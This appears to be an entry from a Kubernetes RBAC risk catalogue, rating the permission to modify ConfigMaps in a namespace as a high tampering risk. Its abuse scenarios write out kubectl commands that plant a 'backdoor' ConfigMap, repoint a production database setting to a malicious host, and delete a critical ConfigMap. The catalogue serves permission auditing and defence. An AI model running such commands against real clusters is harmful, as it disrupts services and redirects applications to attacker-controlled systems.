Modify ConfigMaps in a namespace
Tampering
High
Overview
| Field | Value |
|---|---|
| ID | 1025 |
| Name | Modify ConfigMaps in a namespace |
| Risk Category | Tampering |
| Risk Level | High |
| Role Type | Role |
| API Groups | core |
| Resources | configmaps |
| Verbs | create, update, patch, delete |
| Tags | ConfigMapAccess PotentialPrivilegeEscalation Tampering |
Description
Grants permission to create, update, patch, or delete ConfigMaps within a specific namespace. This allows an attacker to tamper with application configurations, potentially causing service disruption or enabling further exploitation if applications load malicious settings.
Abuse Scenarios
- Create a new ConfigMap with malicious configuration in the namespace.
kubectl create configmap <new-cm-name> --from-literal=malicious_setting=true -n <namespace>
# Example: kubectl create configmap dev-backdoor-config --from-literal=enable_shell=true -n development
- Patch an existing ConfigMap to alter application behavior within the namespace.
kubectl patch configmap <configmap-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/data/<key>", "value": "<new-value>"}]'
# Example: kubectl patch configmap my-app-config -n production --type='json' -p='[{"op": "replace", "path": "/data/db_host", "value": "malicious-db.example.com"}]'
- Delete a critical ConfigMap within the namespace, causing disruption.
kubectl delete configmap <configmap-name> -n <namespace>
# Example: kubectl delete configmap my-app-env -n default